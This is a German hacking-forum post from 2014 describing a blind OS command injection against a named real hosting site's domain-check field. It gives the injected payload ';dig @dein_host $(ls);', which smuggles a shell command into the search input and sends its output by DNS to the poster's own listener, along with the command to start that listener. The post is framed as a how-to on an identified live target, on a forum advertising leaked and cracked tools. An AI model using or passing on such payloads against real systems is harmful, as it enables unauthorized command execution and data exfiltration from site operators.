Jump to content

Willkommen Gast

Navigation

Links

Als Gast hast du nur eingeschränkten Zugriff!


Sign In 

Create Account

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Photo

ip-projects.de - Blind OS Command Injection

- - - - -
Started by Zero-X ,

  • Please log in to reply
No replies to this topic

#1
Zero-X
Posted 30 October 2014 - 19:25 Uhr

Zero-X

    FTB Experte

  • Premium Member
    • Likes
    129
  • 98 posts
  • 45 Bedankt
  • Android
  • Windows, Linux
URL:
https://www.ip-projects.de/webhosting-domaincheck.html

Wenn man bei dieser Seite sich die Ausgabe der Shell über den Befehl "mail" anzeigen lassen will, kann es sein, daß es sehr lange dauert bis man eine E-Mail mit dem entsprechenden Inhalt erhält und "curl ist manchmal etwas umständlich. Deswegen habe ich mir die Ausgabe der Shell über den Befehl "dig" anzeigen lassen. Dig steht für Domain Information Groper und ist ein Befehl, der dazu dient, Informationen von DNS-Servern aubzufragen.

So ist die Vorgehenseise:

Zuerst brauchen wir einen kleinen Server, der alle Anfragen, die an ihn gesendet werden protokolliert.

Diesen habe ich verwendet:

http://bansky.net/echotool/

Scan von Virustotal.com:
SHA256: e1af7723d0672d7169cd259829b743efb0b9ae297276687a063e6853aee55733
Dateiname: echotool.exe
Erkennungsrate: 0 / 53
Analyse-Datum: 2014-10-30 18:01:56 UTC

In der Kommandozeile von Windows geben wir folgendes ein:
echotool /p udp /s 53 /r 53 /l 53

Jetzt lauscht der Server nach UDP-Verbindungen auf Port 53 (Domain Name System).

Im Suchfeld der Webseite geben wir ein:

;dig @dein_host $(ls);

Wenn alles geklappt hat, sehen wir jetzt die Ausgabe des Shell-Befehls im Fenster mit der Kommandozeile.
  • White-Warti likes this
Back to  Classic Hacking

  Topic Forum Started By Stats Last Post Info

This topic has been visited by 42 user(s)


    ¥akuza112, a8107096, akayoshi, BlackZetsu, Bornload, Bot4ng, cooky1, Cranky, Cube, FalkE, FatalityMods, Framerater, G4miT, gutzuu, Laggy, LastKingz, lion., loziov1, minchemuj, most_uniQue, mulu, n4pst3r, nong_dan, notfound, pdr0, Phesii, pornoralle, ProHex, SepaX, smc2014, Smokyjoe, sniffer, Streetboz, Teeworst, Twix2010, ueEqlL, VeqasZ, White-Warti, XCherry, Xenio, zepsus, Zero-X
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.  Classic Hacking